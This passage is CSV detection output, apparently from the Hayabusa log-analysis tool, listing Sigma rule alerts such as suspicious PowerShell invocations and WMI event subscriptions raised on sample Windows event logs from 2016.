+09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 22:57:54.520 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 23:00:17.112 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:45:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-22 06:49:00.074 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - 
Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:28:38.656 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - 
Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 05:58:46.881 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Generic,,rules/sigma/deprecated/powershell_suspicious_invocation_generic.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-27 05:36:53.970 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 18:53:55.378 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 23:10:46.008 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:45:14.660 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:45:14.661 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:45:14.661 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:45:42.333 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:46:17.504 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:46:53.627 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:47:29.168 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:48:26.011 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:48:49.187 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:49:58.603 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:51:06.219 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:51:13.833 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:51:25.086 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:51:39.538 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:52:37.050 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:53:24.700 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:53:57.790 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:35:14.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-04 06:37:55.000 